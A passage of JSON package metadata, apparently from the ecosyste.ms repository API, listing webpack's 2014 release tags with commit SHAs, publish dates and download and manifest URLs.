webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1